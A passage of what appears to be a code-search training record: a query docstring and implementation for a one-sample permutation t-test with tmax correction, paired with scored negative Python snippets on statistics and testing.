return_scores:\r\n result.append(stats)\r\n return tuple(result)", "def test_pyt_multitask(self):\n\n def run_display_test(defaults, ep_and_ex_counts):\n with testing_utils.capture_output() as f:\n parser = display_setup_args()\n parser.set_defaults(**defaults)\n opt = parser.parse_args()\n display_data(opt)\n str_output = f.getvalue()\n self.assertTrue(\n '[ loaded {} episodes with a total of {} examples ]'.format(\n ep_and_ex_counts[0], ep_and_ex_counts[1]\n ) in str_output,\n 'PytorchDataTeacher multitasking failed with '\n 'following args: {}'.format(opt)\n )\n\n task1 = 'babi:task1k:1'\n task2 = 'babi:task1k:2'\n dataset1 = 'flickr30k'\n dataset2 = 'vqa_v1'\n\n # Expected example and episode counts\n eps_and_exs_counts = [\n (1800, 1800),\n (1080, 1800),\n (29900, 29900),\n (29180, 29900),\n (277349, 277349)\n ]\n defaults = parser_defaults.copy()\n\n # 1.\n defaults['pytorch_teacher_task'] = '{},{}'.format(task1, task2)\n run_display_test(defaults, eps_and_exs_counts[0])\n\n # 2.\n defaults['pytorch_teacher_task'] = task1\n defaults['task'] = task2\n run_display_test(defaults, eps_and_exs_counts[1])\n\n # 3.\n del defaults['task']\n defaults['pytorch_teacher_dataset'] = dataset1\n run_display_test(defaults, eps_and_exs_counts[2])\n\n # 4.\n del defaults['pytorch_teacher_task']\n defaults['task'] = task1\n run_display_test(defaults, eps_and_exs_counts[3])\n\n # 5.\n del defaults['task']\n defaults['pytorch_teacher_dataset'] = '{},{}'.format(dataset1, dataset2)\n run_display_test(defaults, eps_and_exs_counts[4])", "def new_permutation(V,m,adj):\r\n\r\n global tent\r\n\r\n perm = V.copy()\r\n \r\n \"\"\" try to select two vertices to swipe wisely. 
\"\"\"\r\n \r\n #we select 1 vertex among the m first vertices\r\n p1 = randint(0,m-1)\r\n \r\n #we select 1 vertex among the vertices left\r\n p2 = randint(m,len(V)-1)\r\n\r\n def comp(p1,p2,adj,perm):\r\n \"\"\"\r\n retrieve the degree of the 2 vertices and\r\n compare the degree\r\n Args:\r\n p1 (int): index of the vertex\r\n p2 (int): index of the vertex\r\n adj (set): set of the edges\r\n perm (int): current permutation of the vertices\r\n\r\n Returns:\r\n bool: true if degree of p2 is higher than the one of p1 ,false otherwise\r\n \"\"\"\r\n #degree of p1\r\n f1 = 0\r\n #degree of p2\r\n f2 = 0\r\n \r\n #compute the degrees\r\n for i in range(m):\r\n if (V[p1],V[i]) in adj or (V[i],V[p1]) in adj:\r\n f1 += 1\r\n\r\n for i in range(m):\r\n if (V[p2],V[i]) in adj or (V[i],V[p2]) in adj:\r\n f2 += 1\r\n \r\n if f2 > f1:\r\n return True\r\n else:\r\n return False\r\n\r\n def check_prior(p1,p2,adj,perm,tent):\r\n \"\"\"\r\n recursive function which try to swipe the 2 vertices \r\n by comparing the degre of the vertexe.\r\n\r\n Args:\r\n p1 (int): index of the vertex\r\n p2 (int): index of the vertex\r\n d (set): set of the edges\r\n perm (set): new permutation\r\n tent (int): we fix the swipe process to tent try.\r\n\r\n Returns:\r\n int: the new neighbor aka permutation\r\n \"\"\"\r\n \r\n #if the degree of the node p2 is higher or if the try is over we swipe \r\n if comp(p1,p2,adj,perm) or tent == 0:\r\n temp = perm[p1]\r\n perm[p1] = perm[p2]\r\n perm[p2] = temp\r\n return perm\r\n \r\n tent -= 1\r\n \r\n #select a new vertex to swipe\r\n p2 = randint(m,len(V)-1)\r\n\r\n return check_prior(p1,p2,adj,perm,tent)\r\n \r\n return check_prior(p1,p2,adj,perm,tent)", "def check_sample_correctishness_bc01(f):\n\n batch_size = 5\n rows = 32\n cols = 30\n channels = 3\n pool_rows = 2\n pool_cols = 3\n\n rng = np.random.RandomState([2012, 9, 26])\n zv = rng.randn(batch_size, channels, rows,\n cols).astype(config.floatX) * 2. - 3.\n top_down_v = rng.randn(batch_size, channels, rows / pool_rows,\n cols / pool_cols).astype(config.floatX)\n\n z_th = T.TensorType(broadcastable=(False, False, False, False),\n dtype = config.floatX)()\n z_th.tag.test_value = zv\n z_th.name = 'z_th'\n\n top_down_th = T.TensorType(broadcastable=(False, False, False, False),\n dtype = config.floatX)()\n top_down_th.tag.test_value = top_down_v\n top_down_th.name = 'top_down_th'\n\n theano_rng = MRG_RandomStreams(rng.randint(2147462579))\n p_th, h_th, p_sth, h_sth = f(z_th, (pool_rows, pool_cols), top_down_th,\n theano_rng)\n\n prob_func = function([z_th, top_down_th], [p_th, h_th])\n pv, hv = prob_func(zv, top_down_v)\n\n sample_func = function([z_th, top_down_th], [p_sth, h_sth])\n\n acc_p = 0. * pv\n acc_h = 0. * hv\n\n # make sure the test gets good coverage, ie, that it includes many\n # different activation probs for both detector and pooling layer\n buckets = 10\n bucket_width = 1. 
/ float(buckets)\n for i in xrange(buckets):\n lower_lim = i * bucket_width\n upper_lim = (i+1) * bucket_width\n\n assert np.any((pv >= lower_lim) * (pv < upper_lim))\n assert np.any((hv >= lower_lim) * (hv < upper_lim))\n\n assert upper_lim == 1.\n\n for i in xrange(10000):\n ps, hs = sample_func(zv, top_down_v)\n\n assert ps.shape == pv.shape\n assert hs.shape == hv.shape\n\n acc_p += ps\n acc_h += hs\n\n est_p = acc_p / float(i+1)\n est_h = acc_h / float(i+1)\n\n pd = np.abs(est_p-pv)\n hd = np.abs(est_h-hv)\n\n \"\"\"\n # plot maps of the estimation error, this is to see if it has some\n # spatial pattern this is useful for detecting bugs like not handling\n # the border correctly, etc.\n from pylearn2.gui.patch_viewer import PatchViewer\n\n pv = PatchViewer((pd.shape[0],pd.shape[3]),(pd.shape[1],pd.shape[2]),\n is_color = False)\n for i in xrange(pd.shape[0]):\n for j in xrange(pd.shape[3]):\n pv.add_patch( (pd[i,:,:,j] / pd.max() )* 2.0 - 1.0, rescale = False)\n pv.show()\n\n pv = PatchViewer((hd.shape[0],hd.shape[3]), (hd.shape[1],hd.shape[2]),\n is_color = False)\n for i in xrange(hd.shape[0]):\n for j in xrange(hd.shape[3]):\n pv.add_patch( (hd[i,:,:,j] / hd.max() )* 2.0 - 1.0, rescale = False)\n pv.show()\n \"\"\"\n\n \"\"\"\n plot expectation to estimate versus error in estimation\n expect bigger errors for values closer to 0.5\n\n from matplotlib import pyplot as plt\n\n #nelem = reduce( lambda x, y : x*y, pd.shape)\n #plt.scatter( pv.reshape(nelem), pd.reshape(nelem))\n #plt.show()\n\n nelem = reduce( lambda x, y : x*y, hd.shape)\n plt.scatter( hv.reshape(nelem), hd.reshape(nelem))\n plt.show()\n \"\"\"\n\n # don't really know how tight this should be\n # but you can try to pose an equivalent problem\n # and implement it in another way\n # using a numpy implementation in softmax_acc.py\n # I got a max error of .17\n assert max(pd.max(), hd.max()) < .17\n\n # Do exhaustive checks on just the last sample\n assert np.all((ps == 0) + (ps == 1))\n assert np.all((hs == 0) + (hs == 1))\n\n for k in xrange(batch_size):\n for i in xrange(ps.shape[2]):\n for j in xrange(ps.shape[3]):\n for l in xrange(channels):\n p = ps[k, l, i, j]\n h = hs[k, l, i*pool_rows:(i+1)*pool_rows,\n j*pool_cols:(j+1)*pool_cols]\n assert h.shape == (pool_rows, pool_cols)\n assert p == h.max()\n assert h.sum() <= 1\n\n \"\"\" If you made it to here, it's correctish\n (cant tell if samples are perfectly \"correct\") \"\"\"", "def test_random_permute_inverse_subdivide(self):\n # reproducible arbitrariness\n np.random.seed(121)\n\n nchan = 3\n nsteps = 20\n rho = 1.0/2\n subdiv = 2\n target = np.random.randn(nchan, nsteps)\n\n controller = LinearController(self.G, target, tau=None)\n\n controller.set_random_permute_inverse(rho, subdivide_by=subdiv)\n self.assertIsNotNone(controller.permute_inverse)\n\n n_per_group = self.N/nchan\n groups0 = np.arange(self.N)/n_per_group\n groups1 = controller.permute_inverse/n_per_group\n\n n_per_subgroup = self.N/(subdiv*nchan)\n subgroups0 = np.arange(self.N)/n_per_subgroup\n subgroups1 = controller.permute_inverse/n_per_subgroup\n\n # check that the right fraction of assignments are kept intact\n self.assertEqual(np.sum(subgroups0 != subgroups1), rho*self.N)\n \n # but that some of the mismatches end up *within the same group*\n # (though they come from different subgroups)\n self.assertNotEqual(np.sum(groups0 != groups1), rho*self.N)" ]
[ "0.6563847", "0.65312606", "0.627106", "0.625189", "0.62488693", "0.6234156", "0.62234485", "0.6194745", "0.60110074", "0.59988236", "0.59065497", "0.5900468", "0.5838992", "0.5809497", "0.58039767", "0.5691553", "0.5606442", "0.5583079", "0.555996", "0.5553208", "0.55497146", "0.5531961", "0.5531961", "0.5526118", "0.5522027", "0.55111307", "0.55111307", "0.5509063", "0.5491687", "0.54826397", "0.54384124", "0.54384124", "0.5420511", "0.5420511", "0.5404128", "0.5353955", "0.5343847", "0.534128", "0.53398603", "0.53244746", "0.5302059", "0.52775323", "0.5273417", "0.5260378", "0.5251287", "0.52492183", "0.5245074", "0.5237367", "0.5207702", "0.52052677", "0.5189326", "0.5186474", "0.5184592", "0.5183656", "0.51760894", "0.51550174", "0.5147022", "0.51405764", "0.5130323", "0.5127566", "0.51268244", "0.5125291", "0.51248556", "0.51247233", "0.509714", "0.5083651", "0.50772065", "0.5075498", "0.5070687", "0.5067533", "0.5067533", "0.50591385", "0.5044336", "0.5043314", "0.5031892", "0.5027236", "0.5012972", "0.50089496", "0.500643", "0.50019443", "0.4996388", "0.49876213", "0.49751693", "0.4966647", "0.49662727", "0.4960101", "0.4958931", "0.49357003", "0.4935416", "0.49343413", "0.493085", "0.49285552", "0.49198192", "0.49142802", "0.49130467", "0.491064", "0.49074996", "0.49026063", "0.49011618", "0.4894371", "0.48929977" ]
0.0
-1
One sample/paired sample permutation test based on a t-statistic. This function can perform the test on one variable or simultaneously on multiple variables. When applying the test to multiple variables, the "tmax" method is used for adjusting the p-values of each variable for multiple comparisons. Like Bonferroni correction, this method adjusts p-values in a way that controls the family-wise error rate. However, the permutation method will be more powerful than Bonferroni correction when different variables in the test
def permutation_t_test(
    X, n_permutations=10000, tail=0, n_jobs=None, seed=None, verbose=None
):
    from .cluster_level import _get_1samp_orders

    n_samples, n_tests = X.shape
    X2 = np.mean(X**2, axis=0)  # precompute moments
    mu0 = np.mean(X, axis=0)
    dof_scaling = sqrt(n_samples / (n_samples - 1.0))
    std0 = np.sqrt(X2 - mu0**2) * dof_scaling  # get std with var splitting
    T_obs = np.mean(X, axis=0) / (std0 / sqrt(n_samples))
    rng = check_random_state(seed)
    orders, _, extra = _get_1samp_orders(n_samples, n_permutations, tail, rng)
    perms = 2 * np.array(orders) - 1  # from 0, 1 -> 1, -1
    logger.info("Permuting %d times%s..." % (len(orders), extra))
    parallel, my_max_stat, n_jobs = parallel_func(_max_stat, n_jobs)
    max_abs = np.concatenate(
        parallel(
            my_max_stat(X, X2, p, dof_scaling) for p in np.array_split(perms, n_jobs)
        )
    )
    max_abs = np.concatenate((max_abs, [np.abs(T_obs).max()]))
    H0 = np.sort(max_abs)
    if tail == 0:
        p_values = (H0 >= np.abs(T_obs[:, np.newaxis])).mean(-1)
    elif tail == 1:
        p_values = (H0 >= T_obs[:, np.newaxis]).mean(-1)
    elif tail == -1:
        p_values = (-H0 <= T_obs[:, np.newaxis]).mean(-1)
    return T_obs, p_values, H0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def PermutationTest(self):\n # U = union of B and T\n union_sample = np.concatenate((self.x_benchmark, self.x_trial), axis=0)\n n_samples = self.NB + self.NT\n \n # Initialize array of test statistic values\n self.TS_tilde = np.zeros(self.n_perm, dtype=np.float)\n \n count=0\n print(\"Running {:d} Permutations... 0%\".format(self.n_perm))\n \n # loop over different samplings\n for i in range(self.n_perm):\n \n # Print progress\n progress = int(round(((i+1)/self.n_perm)*100,0))\n progress_list = [25, 50, 75, 100]\n if count < len(progress_list) and progress == progress_list[count]:\n count+=1\n print(\"Running {:d} Permutations... {:d}%\".format(self.n_perm, progress))\n \n # Random permutations of U (sampling without replacement)\n x_resampled = shuffle(union_sample)\n # Assign first NB elements to Benchmark\n B_resampled = x_resampled[:self.NB]\n # Assign remaning NT elements to Trial\n T_resampled = x_resampled[self.NB:]\n \n # Compute the test statistic\n self.TS_tilde[i] = self.TestStatistic(B_resampled, T_resampled)", "def post_hoc_perm(conditions, n_shuffles, dataframe, method = scipy.stats.ttest_rel, seed = 1010):\n \n np.random.seed(seed)\n\n pairs = [pair for pair in itertools.combinations(conditions, 2)]\n n_pairs = len(pairs)\n\n t = np.floor(n_pairs * 0.25)\n\n obs_cond = {}\n perm_cond = {}\n p_cond = {}\n p_ph = {}\n\n maxT = np.zeros(n_shuffles)\n\n #First loop: Generate permutations\n for n, pair in enumerate(pairs):\n\n if n % t == 0:\n print((n / n_pairs) * 100)\n\n term = pair[0] + '_vs_' + pair[1]\n obs, perm, p = t_perm(dataframe[pair[0]], dataframe[pair[1]], n_shuffles, term)\n obs_cond.update(obs)\n perm_cond.update(perm)\n p_cond.update(p)\n\n\n\n for n in range(0, n_shuffles):\n shuffle = np.array([shuffles[n] for shuffles in perm_cond.values()])\n maxT[n] = shuffle[np.squeeze(np.where(abs(shuffle) == np.max(np.abs(shuffle))))]\n\n p_ph = {cond: sum(abs(maxT) >= abs(obs_cond[cond])) / n_shuffles for cond in obs_cond.keys()}\n \n print('Complete')\n return(obs_cond, perm_cond, maxT, p_ph)", "def test_all_pairs_t_test_few_perms(self):\r\n exp = \"\"\"# The tests of significance were performed using a one-sided (low) Student's two-sample t-test.\r\n# Alternative hypothesis: Group 1 mean < Group 2 mean\r\n# The nonparametric p-values were calculated using 5 Monte Carlo permutations.\r\n# The nonparametric p-values contain the correct number of significant digits.\r\n# Entries marked with \"N/A\" could not be calculated because at least one of the groups\r\n# of distances was empty, both groups each contained only a single distance, or\r\n# the test could not be performed (e.g. 
no variance in groups with the same mean).\r\nGroup 1\tGroup 2\tt statistic\tParametric p-value\tParametric p-value (Bonferroni-corrected)\tNonparametric p-value\tNonparametric p-value (Bonferroni-corrected)\r\nfoo\tbar\t-6.6\t0.00354023978206\t0.0106207193462\tToo few iters to compute p-value (num_iters=5)\tToo few iters to compute p-value (num_iters=5)\r\nfoo\tbaz\t-9.79795897113\t0.000304092472232\t0.000912277416695\tToo few iters to compute p-value (num_iters=5)\tToo few iters to compute p-value (num_iters=5)\r\nbar\tbaz\t-3.0\t0.0288344428112\t0.0865033284337\tToo few iters to compute p-value (num_iters=5)\tToo few iters to compute p-value (num_iters=5)\r\n\"\"\"\r\n obs = all_pairs_t_test(self.labels2, self.dists2,\r\n num_permutations=5, tail_type='low')\r\n self.assertEqual(self.remove_nums(obs), self.remove_nums(exp))", "def compare_samples(populations,parametric=False):\n from scipy.stats import mannwhitneyu, ttest_ind, f_oneway, kruskal, ranksums\n from statsmodels.stats.multicomp import pairwise_tukeyhsd\n populations = [np.array(pop) for pop in populations] #obscure line to take out missing values\n populations = [pop[~np.isnan(pop)] for pop in populations]\n\n if len(populations) == 2:\n if parametric:\n stat, p_value = ttest_ind(*populations)\n print(\"P-value t-test: {0:2.10f}\".format(p_value))\n else:\n stat, p_value1 = mannwhitneyu(*populations)\n print(\"P-value MWW: {0:2.10f}\".format(p_value))\n stat, p_value2 = ranksums(*populations)\n print(\"P-value Ranksum: {0:2.10f}\".format(p_value))\n \n if len(populations) > 2:\n if parametric:\n stat, p_value = f_oneway(*populations)\n print(\"P-value anova: {0:2.10f}\".format(p_value))\n else:\n stat, p_value = kruskal(*populations) \n print(\"P-value kruskal: {0:2.10f}\".format(p_value))\n \n if p_value < 0.05:\n flatten_pop = []\n label_pop = []\n for i,pop in enumerate(populations):\n flatten_pop += list(pop)\n label_pop += [\"pop{0}\".format(i)]*len(pop)\n \n res2 = pairwise_tukeyhsd(np.asarray(flatten_pop),label_pop)\n print(\"Printing pair comparisons using Tukey HSD\")\n print(res2)\n res2.plot_simultaneous(comparison_name=None,xlabel='diffs',ylabel='grups')\n \n print((\"Means: \" + \", {}\"*len(populations)).format(*[np.mean(_) for _ in populations]))\n print((\"STDs: \" + \", {}\"*len(populations)).format(*[np.std(_) for _ in populations]))\n \n \n return p_value", "def lttest_1samp(a,popmean,printit=0,name='Sample',writemode='a'):\r\n x = mean(a)\r\n v = var(a)\r\n n = len(a)\r\n df = n-1\r\n svar = ((n-1)*v)/float(df)\r\n t = (x-popmean)/math.sqrt(svar*(1.0/n))\r\n prob = betai(0.5*df,0.5,float(df)/(df+t*t))\r\n\r\n if printit <> 0:\r\n statname = 'Single-sample T-test.'\r\n outputpairedstats(printit,writemode,\r\n 'Population','--',popmean,0,0,0,\r\n name,n,x,v,min(a),max(a),\r\n statname,t,prob)\r\n return t,prob", "def permutation_test_score(self, estimator, y, n_permutations=100):\n\n return nmf_permutation_test_score(estimator, y, n_permutations=n_permutations)", "def permutation_test_score(self, estimator, y, n_permutations=100):\n\n return nmf_permutation_test_score(estimator, y, n_permutations=n_permutations, verbose=self.verbose)", "def manual_perm_test(model: 'Fitted sklearn estimator',\n X: 'Pandas df',\n y: 'Pandas series',\n true_score: float,\n n_permutations: int=10000,\n plot: bool=True,\n clf: bool=False) -> 'p-value, null_counts':\n\n scores = [] # Empty list for null distribution scores\n n_perms = range(1, n_permutations, 1) # Range of values to permute\n for n in tqdm(n_perms, 
desc='Permutation test'): # tqdm for progress bar\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, stratify=y, test_size=0.90, random_state=n\n )\n model.fit(X_train, y_train)\n y_test_perm = np.random.permutation(y_test) # Permuting class labels\n chance_scores = round(model.score(X=X_test, y=y_test_perm), 4)\n scores.append(chance_scores)\n\n # Converting to a pandas dataframe\n perm_scores_df = pd.DataFrame(data=scores, columns=['null_dist'])\n perm_scores_df['null_dist'] *= 100\n null_counts = (\n perm_scores_df # Counts greater than or equal to our test set score\n .loc[(perm_scores_df['null_dist']) >= true_score]\n .count()\n .iloc[0]\n )\n p_value = (null_counts + 1) / (n_permutations + 1)\n p_value = np.round(p_value, decimals=5)\n\n if plot is True: # Plotting a histogram of permutation scores\n plt.figure(figsize=(10, 10))\n sns.distplot(a=perm_scores_df['null_dist'],\n hist=True,\n label='Permutation scores')\n ylim = plt.ylim()\n if clf is False:\n # True classifier score and p-value\n plt.plot(2 * [true_score],\n ylim,\n '--g',\n linewidth=3,\n label='R2 score %s (pvalue : %s)' %\n (true_score, p_value))\n else:\n plt.plot(2 * [true_score],\n ylim,\n '--g',\n linewidth=3,\n label='Multimodal AUC score: %s (pvalue = %s)' %\n (true_score, p_value))\n n_classes = np.unique(y).size\n chance = 2 * [100. / n_classes]\n plt.plot(chance,\n ylim,\n '--k',\n linewidth=3,\n label='Null model mean AUC score: %s' % 50.00)\n \n plt.ylim(ylim)\n plt.legend(loc='lower center', bbox_to_anchor=(0.5, -0.38))\n plt.tight_layout()\n\n if clf is False:\n plt.xlabel(xlabel='R2 Scores')\n else:\n plt.xlabel(xlabel='AUC Scores')\n plt.title(label='Null Distribution')\n plt.savefig('quadratic_null_dist.png', dpi=300, bbox_inches='tight')\n plt.show()\n\n return p_value, null_counts", "def _t_test(_sample_a, _sample_b):\n res = stats.ttest_ind(_sample_a, _sample_b, axis=0, equal_var=equal_var, nan_policy='propagate')\n print('Independent t-test\\nt-statistic: {}\\np-value: {}'.format(res[0], res[1]))\n print('-' * 10)", "def attest_1samp(a,popmean,printit=0,name='Sample',writemode='a'):\r\n if type(a) != N.ndarray:\r\n a = N.array(a)\r\n x = amean(a)\r\n v = avar(a)\r\n n = len(a)\r\n df = n-1\r\n svar = ((n-1)*v) / float(df)\r\n t = (x-popmean)/math.sqrt(svar*(1.0/n))\r\n prob = abetai(0.5*df,0.5,df/(df+t*t))\r\n\r\n if printit <> 0:\r\n statname = 'Single-sample T-test.'\r\n outputpairedstats(printit,writemode,\r\n 'Population','--',popmean,0,0,0,\r\n name,n,x,v,N.minimum.reduce(N.ravel(a)),\r\n N.maximum.reduce(N.ravel(a)),\r\n statname,t,prob)\r\n return t,prob", "def test_permutation(perm):\n n_src = len(perm)\n perm_tensor = torch.Tensor(perm)\n source_base = torch.ones(1, n_src, 10)\n sources = torch.arange(n_src).unsqueeze(-1) * source_base\n est_sources = perm_tensor.unsqueeze(-1) * source_base\n\n loss_func = PITLossWrapper(pairwise_mse)\n loss_value, reordered = loss_func(est_sources, sources, return_est=True)\n\n assert loss_value.item() == 0\n assert_allclose(sources, reordered)", "def test_permutations(experiment, verbose=False):\n topics = experiment.topics\n no_topics = len(topics) # The total number of topics used for the given experiment.\n no_permutations = experiment.n # The total number of possible permutations.\n\n if verbose:\n print \"Topics: {0} (total of {1})\".format(topics, no_topics)\n print \"Total permutations: {0}\".format(no_permutations)\n print\n\n for i in range(0, no_permutations):\n rotations = experiment.get_rotations(i)\n\n if verbose:\n print 
\"Permutation {0} ({1})\".format(i, rotations)\n\n for k in range(0, no_topics):\n rotation_topic = experiment.get_rotation_topic(i, k)\n\n if verbose:\n print \"\\tTopic {0} at permutation list position {1}\".format(rotation_topic, k)\n\n if experiment.get_rotations(i)[k] == experiment.get_rotation_topic(i, k):\n if verbose:\n print \"\\t\\tPASS\"\n else:\n if verbose:\n print \"\\t\\tFAIL\"\n return False\n\n if verbose:\n print \"Permutation check PASSED\"\n\n return True", "def ttest(x, mu=0, alpha=0.05, is_bernoulli=False, two_sided=True, return_tuple=False):\n\n # Define test degrees of freedom\n if two_sided:\n quant_order = 1 - (alpha / 2)\n h0 = f'X_bar = {mu}'\n h1 = f'X_bar != {mu}'\n else:\n quant_order = 1 - alpha\n h0 = f'X_bar <= {mu}'\n h1 = f'X_bar > {mu}'\n\n # Input vector as array\n x = np.asarray(x)\n # Sample size\n n = len(x)\n\n # Empirical mean\n x_bar = x.mean()\n # s estimator (variance)\n if is_bernoulli:\n s2 = x_bar * (1 - x_bar)\n else:\n s2 = desc.var(x)\n\n # Degrees of freedom\n df = n - 1\n\n # T statistic\n t = (x_bar - mu) / (math.sqrt(s2 / n))\n if two_sided:\n t = math.fabs(t)\n # p and critical values\n p = 2.0 * (1.0 - scp.t.cdf(t, df=df))\n\n if n > 30:\n cv = scp.norm.ppf(quant_order)\n else:\n cv = scp.t.ppf(quant_order, df=df)\n\n _summ = test_summary(df=df, critical_value=cv, t_value=t,\n p_value=p,\n title='One Sample Student test',\n h0=h0, h1=h1,\n alpha=alpha)\n\n if return_tuple:\n return t, cv, p\n else:\n return _summ", "def ttest_review(sample_1, sample_2, alpha=.05):\n\n result = stats.ttest_ind(sample_1, sample_2)\n crit_val, p_val = result\n \n ## Creating interpretation based on p-value results.\n\n if p_val < .05:\n print(f'The feature is statistically significant with a p-value of {p_val}.')\n\n else:\n print(f'The feature is not statistically significant with a p-value of {p_val}.')\n \n return p_val", "def permutation_test(overlap_bins, nonoverlap_bins, thresh, ntrials):\n X = num_top_snps(I(overlap_bins.values()), thresh)\n if X == 0:\n return thresh, 0, 0, 0, 1, 0, 0\n overlap_counts = {k: len(overlap_bins[k]) for k in overlap_bins}\n Y = [num_top_snps(match(overlap_counts, nonoverlap_bins), thresh) for _ in range(ntrials)]\n mean, variance = moments(Y)\n anderson, critical_values, _ = scipy.stats.anderson(Y)\n exact_p = (1 + len([y for y in Y if y >= X])) / (1 + ntrials)\n return thresh, X, mean, variance, exact_p, anderson, critical_values[2]", "def test_p_tilda(self, test_inputs, random_inputs, training):\n \n self.batch_size = test_inputs.shape[0]\n \n self.num_samples = random_inputs.shape[0]\n \n self.add_p_tilda(training = training)\n \n var_list = [self.x, self.x_tilda]\n \n get_p_tilda = theano.function(inputs = var_list,\n outputs= self.p_tilda)\n \n probs = get_p_tilda(test_inputs, random_inputs)\n \n si = self.batch_size+self.np_rand_gen.choice(self.num_samples, 10, False)\n \n return probs[0:self.batch_size], probs[si]", "def test_permutation(self):\r\n # Check over two calls to see if the random state is correctly updated.\r\n random = RandomStreams(utt.fetch_seed())\r\n fn = function([], random.permutation((20,), 10), updates=random.updates())\r\n\r\n fn_val0 = fn()\r\n fn_val1 = fn()\r\n\r\n rng_seed = numpy.random.RandomState(utt.fetch_seed()).randint(2**30)\r\n rng = numpy.random.RandomState(int(rng_seed)) #int() is for 32bit\r\n\r\n # rng.permutation outputs one vector at a time, so we iterate.\r\n numpy_val0 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n numpy_val1 = 
numpy.asarray([rng.permutation(10) for i in range(20)])\r\n\r\n assert numpy.all(fn_val0 == numpy_val0)\r\n assert numpy.all(fn_val1 == numpy_val1)", "def paired_permutation_test(D1, a, b, tradeoff, threshold=0.05, R=10000, verbose=1):\n\n # extract the scores by example for each system\n A = D1[D1.policy == a]\n B = D1[D1.policy == b]\n assert (A.example == B.example).all()\n assert (A.index == B.index).all()\n\n W = B.want.sum() # number of thing we want is constant among permutations\n n = len(A.index)\n\n AC = np.array(A.want_and_got) * 1.0\n AG = np.array(A.got) * 1.0\n A_runtime = np.array(A.pushes) * 1.0\n\n BC = np.array(B.want_and_got) * 1.0\n BG = np.array(B.got) * 1.0\n B_runtime = np.array(B.pushes) * 1.0\n\n # observed value of test statistic -- the difference of rewards.\n T_observed = test_statistic(AC, AG, A_runtime,\n BC, BG, B_runtime,\n np.zeros(n, dtype=np.int32), W, tradeoff)\n\n r = 0.0\n for _ in iterview(range(R), msg='perm test'):\n # randomly generate a vector of zeros and ones (uniformly).\n # Note: endpoint not included in np.random.randit (that's why theres a 2).\n flip = np.random.randint(0, 2, size=n).astype(np.int32)\n if test_statistic(AC, AG, A_runtime,\n BC, BG, B_runtime,\n flip, W, tradeoff) >= T_observed:\n r += 1\n s = (r+1)/(R+1)\n\n # observed rewards\n ra = cgw_f(AC.sum(), AG.sum(), W) - tradeoff*A_runtime.mean()\n rb = cgw_f(BC.sum(), BG.sum(), W) - tradeoff*B_runtime.mean()\n\n if verbose:\n # which system has higher reward? is it significant?\n asig = (red % bold) if ra > rb and s <= 0.05 else '%s'\n bsig = (blue % bold) if rb > ra and s <= 0.05 else '%s'\n any_sig = bold if s <= threshold else yellow\n\n print asig % 'R(A) = %g (%s)' % (ra, a)\n print bsig % 'R(B) = %g (%s)' % (rb, b)\n print any_sig % 'confidence = %g' % (1-s)\n print\n\n if s <= threshold:\n return s, -1 if ra > rb else +1\n else:\n return s, 0 # \"statistical tie\"", "def run_paired_t(data_generator):\r\n test_stats, pvals = [], []\r\n for b_data, a_data in data_generator:\r\n test_stat, pval = t_paired(b_data, a_data)\r\n test_stats.append(test_stat)\r\n pvals.append(pval)\r\n return test_stats, pvals", "def mc_t_two_sample(x_items, y_items, tails=None, permutations=999,\r\n exp_diff=0):\r\n if tails is not None and tails != 'high' and tails != 'low':\r\n raise ValueError(\"Invalid tail type '%s'. Must be either None, \"\r\n \"'high', or 'low'.\" % tails)\r\n if permutations < 0:\r\n raise ValueError(\"Invalid number of permutations: %d. Must be greater \"\r\n \"than or equal to zero.\" % permutations)\r\n\r\n if (len(x_items) == 1 and len(y_items) == 1) or \\\r\n (len(x_items) < 1 or len(y_items) < 1):\r\n raise ValueError(\"At least one of the sequences of observations is \"\r\n \"empty, or the sequences each contain only a single \"\r\n \"observation. 
Cannot perform the t-test.\")\r\n\r\n # Perform t-test using original observations.\r\n obs_t, param_p_val = t_two_sample(x_items, y_items, tails=tails,\r\n exp_diff=exp_diff,\r\n none_on_zero_variance=False)\r\n\r\n # Only perform the Monte Carlo test if we got a sane answer back from the\r\n # initial t-test and we have been specified permutations.\r\n nonparam_p_val = nan\r\n perm_t_stats = []\r\n if permutations > 0 and not (isnan(obs_t) or isnan(param_p_val)):\r\n # Permute observations between x_items and y_items the specified number\r\n # of times.\r\n perm_x_items, perm_y_items = _permute_observations(x_items, y_items,\r\n permutations)\r\n perm_t_stats = [t_two_sample(perm_x_items[n], perm_y_items[n],\r\n tails=tails, exp_diff=exp_diff,\r\n none_on_zero_variance=False)[0]\r\n for n in range(permutations)]\r\n\r\n # Compute nonparametric p-value based on the permuted t-test results.\r\n if tails is None:\r\n better = (absolute(array(perm_t_stats)) >= absolute(obs_t)).sum()\r\n elif tails == 'low':\r\n better = (array(perm_t_stats) <= obs_t).sum()\r\n elif tails == 'high':\r\n better = (array(perm_t_stats) >= obs_t).sum()\r\n nonparam_p_val = (better + 1) / (permutations + 1)\r\n return obs_t, param_p_val, perm_t_stats, nonparam_p_val", "def permutation(data, dataLabel=None, nperm=10000, decimals=4):\n\n # test calling values\n if data is None or not isinstance(data, dict) or len(data.keys()) != 2:\n raise ValueError('RSTATS.permutation: data must be'\n + ' a dictionary with at exactly 2 keys'\n + '\\nUse KW (anova) for more than 2 groups')\n\n k = list(data.keys())\n\n g1 = data[k[0]]\n g2 = data[k[1]]\n # (w1, p1) = Stats.shapiro(g1, a=None, reta=False)\n # (w2, p2) = Stats.shapiro(g2, a=None, reta=False)\n\n combined = np.concatenate((g1, g2))\n diffobs = np.mean(g2)-np.mean(g1)\n diffs = np.zeros(nperm)\n nperm = nperm\n index = range(0, combined.shape[0])\n for i in range(nperm):\n # draw from combined data set without replacement\n #shuff = np.random.randint(combined.shape[0], size=combined.shape[0])\n shuff = np.random.permutation(index)\n ar = combined[shuff[0:len(g1)]]\n br = combined[shuff[len(g1):]]\n diffs[i] = np.mean(br) - np.mean(ar)\n pvalue = np.sum(np.abs(diffs) >= np.abs(diffobs)) / float(nperm)\n if dataLabel is not None:\n print ('\\n%s: Permutation Test (Nperm = %d)' % (dataLabel, nperm))\n # if p1 < 0.05 and p2 < 0.05:\n # print(u' Both data sets appear normally distributed: Shapiro-Wilk Group 1 p = {:6.3f}, Group2 p = {:6.3f}'.format(p1, p2))\n # else:\n # print(u' ****At least one Data set is NOT normally distributed****\\n Shapiro-Wilk Group 1 p = {:6.3f}, Group2 p = {:6.3f}'.format(p1, p2))\n # print (u' (Permutation test does not depend on distribution)')\n \n n = max([len(l) for l in k])\n print(u' 